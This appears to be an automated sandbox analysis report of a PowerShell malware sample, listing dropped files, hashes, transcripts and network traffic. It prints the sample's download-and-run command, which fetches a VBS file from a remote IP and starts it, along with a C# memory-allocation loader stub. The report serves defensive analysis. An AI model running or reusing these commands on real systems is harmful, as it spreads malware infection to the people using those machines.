                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:modified
                  Size (bytes):11606
                  Entropy (8bit):4.889221124293713
                  Encrypted:false
                  SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib4fe2Ca6pZlR:dMib4T4YLiib4fxopbjvwRjdvRTniQ0P
                  MD5:DBAF0AC6B37CA6806A1C4AF9DF83C99D
                  SHA1:68AC141D6D56D93B52C81C0F18B26A5B9755A79F
                  SHA-256:1DF55044C6D8EDFF49DA570CD306B0BE68A3D97DCEE02A5D417DB5223D3AA543
                  SHA-512:B5F0DA77EF5AEE08E55E12DAA7FA0BF631A77D4F94F17951D8ADB3D38CA81743862F90D3C232F9E75D701E2A823A4BE39BA3D1689631816D40C15E455CB38C46
                  Malicious:false
                  Preview:PSMODULECACHE.....7B\.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........3......[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1200
                  Entropy (8bit):5.318432830754259
                  Encrypted:false
                  SSDEEP:24:3UCPpQrLAo4KAxX5qRPD42HOoFe9t4CvKaBPnKdr+q:lPerB4nqRL/HvFe9t4CvpBfur+q
                  MD5:D7F10739CE94FBBD93A1C0724A750BDB
                  SHA1:4E5FFBF85D29084A0BD94B1E067109BFF1B527CE
                  SHA-256:5311F389A445AC225504B04B4653867DB1D811838A4118075C94409AF3B77FE1
                  SHA-512:C4BFEA1462B2EF412013956C63859F5433EB38A3F9FB1158CA375D0DD412E284519E2E489A104F8D794CF3920955870A1AD5EA65133F248434BFF972007CCAC8
                  Malicious:false
                  Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins

                  C:\Users\user\AppData\Local\Temp\RES5295.tmp

                  Download File
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                  Category:dropped
                  Size (bytes):1328
                  Entropy (8bit):3.9821202951451133
                  Encrypted:false
                  SSDEEP:24:HVe9EuZfW8jJXDfH4hKEbsmfII+ycuZhNmdo5akSfdoOPNnq9qd:cB3zaKPmg1ulSaa3FBq9K
                  MD5:505A72B275501CAC0414CE22B67825FA
                  SHA1:9DAFB6870CAA22AB16A3D0B6865799DC8C17BF8E
                  SHA-256:707741E78DCD26E29FACB6B79FD9B9DF25B4639BF3FF07F18BD0CA9BB233BFD0
                  SHA-512:5D7777248EB7D0DC6AB1031E71595810A8E5124FB3E12C8D59D670DAE2F604C621E8178604ACB7A6AD4849E60B24A1652D9FD043F3B503029C77E68C64C77C0A
                  Malicious:false
                  Preview:L....zb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\xtg032l3\CSC5582155B3987404B8B25346C869765C.TMP.................\C......c91...5..........4.......C:\Users\user\AppData\Local\Temp\RES5295.tmp.-.<...................'...Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.t.g.0.3.2.l.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31atpqyt.iuu.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eghthspv.xqw.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhyqppvk.wu3.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gstzwz1n.ooj.ps1

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqfeipil.5om.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ymlh0dzf.0zd.psm1

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1

                  C:\Users\user\AppData\Local\Temp\xtg032l3\CSC5582155B3987404B8B25346C869765C.TMP

                  Download File
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                  File Type:MSVC .res
                  Category:dropped
                  Size (bytes):652
                  Entropy (8bit):3.098629909666731
                  Encrypted:false
                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryMdo5ak7YnqqfdoOPN5Dlq5J:+RI+ycuZhNmdo5akSfdoOPNnqX
                  MD5:EB5C43059DA31ED5EC6339319EA48835
                  SHA1:F2759B61893FFD40EAFA4863CD0EDB8E5533EAFA
                  SHA-256:36DB6AD58A67ABA40B090C2078CB6642E8CEB5D7CAD3194C4D2DB8EE92026D78
                  SHA-512:AE9528866B8F3276A81C1C26A1138E6AA14B6D32FBA7D4B7BDE46C9F862595ABDB7AC4E2CF3C574628E34330923F131ED83E2CC52CC0D0FDA3C816C7C04E96EB
                  Malicious:false
                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.t.g.0.3.2.l.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.t.g.0.3.2.l.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                  C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.0.cs

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):487
                  Entropy (8bit):5.236532790609796
                  Encrypted:false
                  SSDEEP:12:V/DGr0nHWP7xReX6Sq76zSPRHC9ftAnHCARHpWfOQAKaD:JowWPFRI6SZzSlC9ftErpWhAV
                  MD5:56B3B782DBCC5028A8050646F2177FB1
                  SHA1:8B819399A5BC15644D6B81D5438A7B78E34662FC
                  SHA-256:A4DC022E81A07FEDD233869623B65353C72084C6C7971DA2F4A222F2C2223A3A
                  SHA-512:93F796C7CA68AAA78D3EA1C35E97C1C1FC5CE13ED528856DF53BF84FD254E6D2165D0A1122F321008C1DE4EEB00B4B3AFFDB23E5A95709F42305413011BB1A8B
                  Malicious:false
                  Preview:.using System;..using System.Runtime.InteropServices;..public static class Hexastich1..{..[DllImport("KERNEL32")]public static extern void RtlMoveMemory(IntPtr Bagfuls51,ref Int32 Bagfuls52,int Bagfuls53);..[DllImport("ntdll.dll", EntryPoint="NtAllocateVirtualMemory")]public static extern int VA(int Hexastich6,ref Int32 Semire,int Bagfuls5,ref Int32 Hexastich,int Print8,int Hexastich7);..[DllImport("USER32")]public static extern IntPtr EnumWindows(uint Bagfuls55,int Bagfuls56);..}

                  C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdline

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):369
                  Entropy (8bit):5.254565368001567
                  Encrypted:false
                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fGn5KD+zxs7+AEszIwkn23fGn5KEA:p37Lvkmb6KRfunED+WZEifunEEA
                  MD5:C6D26A2F306341082CF3D4E7FE29F1DB
                  SHA1:80B6461E5F02D3AF63A84876CAE261BF417449F7
                  SHA-256:37DB437489762A0FFBA8E3460F514DA4CA87533F3D7ACBF3997D09B96466D5CB
                  SHA-512:AECFBCF1B206F50F18589DD09E13E28AD6FF36C8FFCB1DFE60F845D8CBA4609947E292542BC4F9D802C151C82B67CBB375B1BFFBBCF758F24BB9C0CE2DD6DD8F
                  Malicious:false
                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.0.cs"

                  C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.dll

                  Download File
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3584
                  Entropy (8bit):2.800737969834327
                  Encrypted:false
                  SSDEEP:48:6vblYoGZQu4xKsf9BFZwUvT1ulSaa3FBq:GlYoGuu4xJ1cNK
                  MD5:DD7A380DE44D9286DD26DD2996C0119C
                  SHA1:779B8187C01D83714ABFA4CFA6C3BC159EF525FF
                  SHA-256:A488A4BAA44C85FA03F307108179B0A0A6E4BB2C208944650E487F14F5CB57CF
                  SHA-512:1456C98428191BDBE6D478C58F32EFE62B44F5B686A3432CE5B834ACE66B74DF29D80EEA11EEE034E5C01D92F875CF70F89D0E62C82C0C9FBF0B1C5327D59A88
                  Malicious:false
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....zb...........!................n$... ...@....... ....................................@..................................$..S....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P$......H.......P ..............................................................BSJB............v4.0.30319......l...X...#~..........#Strings....T.......#US.\.......#GUID...l...\...#Blob...........G.........%3............................................................2.+...............K.,.................................... 9............ G............ J.........V.....`.....j.....t...............................................$.....).!...-.....2.....;.^.g.......9.......q.......J.....

                  C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.out

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):867
                  Entropy (8bit):5.327239025067284
                  Encrypted:false
                  SSDEEP:24:KJBqd3ka6KRfWED/EifWEE1KaM5DqBVKVrdFAMBJTH:Cika6CPEuiKxDcVKdBJj
                  MD5:6E9FACBC3733F6688707044FD9EB4413
                  SHA1:5116961171A3A26EEF1904F64FA3C673E5652EC9
                  SHA-256:2E5429B9AF5EBBB0C796C185B4CCCA5485814C2DA15FFAF85973914F62E5888D
                  SHA-512:9A91BAC986C3C713E80B4E168880C5E21293D02111041806A97718858464EC492000B797B485F4B35FB5C0DDD092757CD938F2B2BB53F811DDA228C128558824
                  Malicious:false
                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6205
                  Entropy (8bit):3.7489766835293885
                  Encrypted:false
                  SSDEEP:48:k437m9LiF10CYUHl8qjeukvhkvklCywPs1ozQ8/nSogZofM1ozQ8/nSogZozH:kIm9mF10CReqDkvhkvCCtUuQBH3uQBH2
                  MD5:BBE10FD90F7662CE71B0F0E2EB9640AE
                  SHA1:D3F05A11EE8D45F9F239E3F45DCA2CDD373D7DAE
                  SHA-256:F2E0E8100642DA826976A9A787AEB399D6534E8A8292910403CE43250E45B41B
                  SHA-512:E793E1AC424D261DE162930BECFB77AF7DBEEBD209DBCB4B4BC7B724136518586835B8DE2BCDDF51878351680ED9AC1FB885E150CD7F1F687E496A9E9E0E8943
                  Malicious:false
                  Preview:...................................FL..................F.".. ....J...-...rt^.`..\.................................:..DG..Yr?.D..U..k0.&...&...........-....P..2..w..8.d......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N...T.......Y....................yN|.A.p.p.D.a.t.a...B.V.1......N....Roaming.@.......N...T.......Y.....................K..R.o.a.m.i.n.g.....\.1.....>Q.;..MICROS~1..D.......N...T.......Y.....................sJ.M.i.c.r.o.s.o.f.t.....V.1.....hTjM..Windows.@.......N...T.......Y....................d...W.i.n.d.o.w.s.......1......N....STARTM~1..n.......N...T.......Y..............D.....6...S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.S..Programs..j.......N...T.......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......N..hTKM.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......N...P3Q.....Y..........

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5U6NMO9ACOK0QV40NE2D.temp

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6205
                  Entropy (8bit):3.7489766835293885
                  Encrypted:false
                  SSDEEP:48:k437m9LiF10CYUHl8qjeukvhkvklCywPs1ozQ8/nSogZofM1ozQ8/nSogZozH:kIm9mF10CReqDkvhkvCCtUuQBH3uQBH2
                  MD5:BBE10FD90F7662CE71B0F0E2EB9640AE
                  SHA1:D3F05A11EE8D45F9F239E3F45DCA2CDD373D7DAE
                  SHA-256:F2E0E8100642DA826976A9A787AEB399D6534E8A8292910403CE43250E45B41B
                  SHA-512:E793E1AC424D261DE162930BECFB77AF7DBEEBD209DBCB4B4BC7B724136518586835B8DE2BCDDF51878351680ED9AC1FB885E150CD7F1F687E496A9E9E0E8943
                  Malicious:false
                  Preview:...................................FL..................F.".. ....J...-...rt^.`..\.................................:..DG..Yr?.D..U..k0.&...&...........-....P..2..w..8.d......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N...T.......Y....................yN|.A.p.p.D.a.t.a...B.V.1......N....Roaming.@.......N...T.......Y.....................K..R.o.a.m.i.n.g.....\.1.....>Q.;..MICROS~1..D.......N...T.......Y.....................sJ.M.i.c.r.o.s.o.f.t.....V.1.....hTjM..Windows.@.......N...T.......Y....................d...W.i.n.d.o.w.s.......1......N....STARTM~1..n.......N...T.......Y..............D.....6...S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.S..Programs..j.......N...T.......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......N..hTKM.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......N...P3Q.....Y..........

                  C:\Users\user\Desktop\Sursdepa.vbs

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ISO-8859 text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):236358
                  Entropy (8bit):4.512575626068564
                  Encrypted:false
                  SSDEEP:3072:GlDrUO7/A9bLSzUFA7UqMAZ5uNIIhOD2Xq6s2mFgM:EHo9i434Z5uCIhLXC2pM
                  MD5:A382F9565D886D24DD48272EA634D7F4
                  SHA1:EC69AE77CB27ED66A7E30A60CFE08066A02331AD
                  SHA-256:A46BAD45E29490A9CCA35D894E5D0CA5FB3D78E4A6084B2E403307C73B3845DF
                  SHA-512:6BC1D779A8EAED0496C593E785FA366EC1E82269A95431E08B606E1C699AF21DB1038CAABF74C946D2EF61A5C82A6C5FE787AE1D92E0DD0D62E3228AB2E6B520
                  Malicious:false
                  Preview:'elaeocar Fredni8 kildeteks SEKSEREN trknings Blomsterga Drummers5 Ramhe Tvungen Vermicleno RYGSTDINDI Kontere Abortede KRET agtetsed Midtve8 Suprac Incrus Balneaeu6 Systemrela4 NATIONER denegat Interplay Intergen dandyisms FERR ..'TVILLIN Overm7 Kvarkssubs6 UNDERFR nielle Tabacinge5 Timevistsa4 APSI Chrisro8 lappishcdg unmatchab frstefdsel BEVGELSE relicary Predenia7 Ansgning stiksa Solf BLOKFUNKTI Katarakt3 siderefe ..'sch.uble Syges6 dibbuksil Bloms HORSE teleopp Ombuddets Centr5 Boulevardt Bipinnat8 AFBLS reinduce overelab Kogeg5 cantionarb Immundic3 abbed MONETIZ branc Semimedic WAGINGR ..'Pantheism1 Efterb8 Critic Tallseun3 Inflows2 disse Tegneblok3 Goodhear Raaolierne ..'Egetforb torsk kruma Soningersw3 Theo4 FREMRYKNIN Inferreri unpred INDESNEEN equival OVERDELIC indf videokamer Energimn1 Dogf Kaste ..'Quiltskra Quabirdop Udraa7 svarbreve Hicksit ochersepis Unlabial Cliq Vendinge1 Oversigsta5 BONFIL Sumpf1 Ufor4 Gravemaski Hyperperfe1 catego Discipl2 FALS Twinjetcal2 ELORGLERSA

                  C:\Users\user\Documents\20220510\PowerShell_transcript.226546.4nuvXr5_.20220510184435.txt

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1053
                  Entropy (8bit):5.161870865373194
                  Encrypted:false
                  SSDEEP:24:BxSA07vBZ/x2DOXUWFUZ5tWBHjeTKKjX4CIym1ZJXoUZ5yWnxSAZ1S:BZyvj/oOlyeBqDYB1Z+y5ZZM
                  MD5:7F2A93EB2B61A67CC7CC03A6BB71FE42
                  SHA1:F74065C94AD1CF50DD3980DC0879CE4D20491791
                  SHA-256:EAC8007092FBC3524AA281BDBF9E6142E1A7E20194378A0231CE863A29F3BD72
                  SHA-512:62B2F00BA602AEE169FFC83E9D0F759384A561D1DC53AFD6CD7BBC7FFE299042080AB191E48A04326A6ECC3C0041359AA151160D4B76D76D64213F6751C445F5
                  Malicious:false
                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220510184438..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 226546 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs..Process ID: 6344..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220510184438..**********************..PS>Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs..**********************..Command start time: 20220510184703..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript en

                  C:\Users\user\Documents\20220510\PowerShell_transcript.226546.z5QqKyyo.20220510184433.txt

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1021
                  Entropy (8bit):5.113387706445619
                  Encrypted:false
                  SSDEEP:24:BxSARy7vBZ/x2DOXUW6Y+PWcHjeTKKjX4CIym1ZJXYPnxSAZ+:BZ2vj/oORZcqDYB1ZS/ZZ+
                  MD5:89247E981DBC22B1D59AF404180B0D68
                  SHA1:C5799BA3D83B298F9911602B634B3F04ADA528C9
                  SHA-256:CE32257188627522CDDDDA21D621BCAD843A51656BFD19B5A8F0D0F6B227E354
                  SHA-512:8BE91E842E67AEC93766B1DA3353E6DD56FC67D87D4D33601F8170890E4CDDD61637C7D3AF88F21201213ED789A4305730F0AFC4D16B6A36CBC9C6F53A8F8A65
                  Malicious:false
                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220510184434..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 226546 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noLogo -ExecutionPolicy unrestricted -file C:\Users\user\Desktop\book.ps1..Process ID: 3144..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220510184434..**********************..PS>CommandInvocation(book.ps1): "book.ps1"....**********************..Command start time: 20220510184954..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20220510184954..***

                  Static File Info

                  General

                  File type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Entropy (8bit):4.908253738543961
                  TrID:
                  • Text - UTF-8 encoded (3003/1) 100.00%
                  File name:book.ps1
                  File size:108
                  MD5:10c1a6b6135d5f641ed56cfde0da1967
                  SHA1:dbf7d6327c2bf13f3ae772f6eaaa1c0a5fc5473e
                  SHA256:75de1e1b097579bf1a18c494042b16192a969dfb0fb9cdb3759d362b7b4b6a5f
                  SHA512:340fd3f2c364c852582c17d01742bad113e599aa32e1102e5837023b34d1838acdefeca1646ba8579cafb887bcf6715a4a578dd24828a4dfbdfb5efc07f866c1
                  SSDEEP:3:QK/JJFsLTzTH3x85MHVf3tFdkQPVAWBxWjsWrK3HsWn:pYzLh8uvtnZPiGQj2Xn
                  TLSH:EFB01216DF172E0D060D4C60F074B9E1A6817772B46C51EAE1B93005754F5436247838
                  File Content Preview:...powershell Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs..start Sursdepa.vbs

                  File Icon

                  Icon Hash:72f2d6fef6f6dae4

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  May 10, 2022 18:44:40.385945082 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.409142017 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.409244061 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.413928032 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.438344955 CEST804972846.4.198.55192.168.2.4
